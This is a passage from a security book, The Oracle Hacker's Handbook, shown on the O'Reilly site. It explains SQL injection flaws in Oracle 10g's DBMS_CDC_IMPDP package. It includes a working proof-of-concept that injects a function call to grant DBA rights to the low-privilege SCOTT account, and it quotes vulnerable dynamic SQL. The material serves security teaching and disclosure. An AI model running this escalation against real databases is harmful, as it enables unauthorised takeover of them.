5.10. Some Real-World Examples
These examples are taken from 10g Release 2, fully patched; and at the time of writing they are still vulnerable. They have all been reported to Oracle and patches should be available before this book hits the stores.
5.10.1. Exploiting DBMS_CDC_IMPDP
The BUMP_SEQUENCE procedure of the DBMS_CDC_IMPDP package is vulnerable to SQL injection. This is one example of a vulnerability that was missed by the Oracle data flow tool as it crosses the boundary between PL/SQL and C:
PROCEDURE BUMP_SEQUENCE (SEQUENCE_OWNER IN VARCHAR2,
SEQUENCE_NAME IN VARCHAR2,
NEW_VALUE IN NUMBER) IS
EXTERNAL
NAME "qccdtp_bumpSequence"
LIBRARY DBMS_CDCAPI_LIB
PARAMETERS(
SEQUENCE_OWNER OCISTRING,
SEQUENCE_NAME NEW_VALUE LANGUAGE C;
The preceding vulnerability can be exploited as follows:
CONNECT SCOTT/TIGER
SET SERVEROUTPUT ON
CREATE OR REPLACE FUNCTION MYFUNC RETURN VARCHAR2 AUTHID CURRENT_USER IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
DBMS_OUTPUT.PUT_LINE('In function...');
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN 'STR';
END;
/
GRANT EXECUTE ON MYFUNC TO PUBLIC;
EXEC
DBMS_CDC_IMPDP.BUMP_SEQUENCE('SYS','BBB''||SCOTT.MYFUNC()||''BBB',0);
The VALIDATE_IMPORT procedure in this package is also vulnerable. The code in this procedure executes the following:
STMT_BUF := 'DELETE FROM "' || VER_PUB || '"."' || VER_VLDTAB || '" WHERE import_error = ''Y'''; EXECUTE IMMEDIATE STMT_BUF; STMT_BUF := 'SELECT name, vldtype FROM "' || VER_PUB || '"."' || VER_VLDTAB || '" ORDER ...
Get The Oracle® Hacker's Handbook: Hacking and Defending Oracle now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
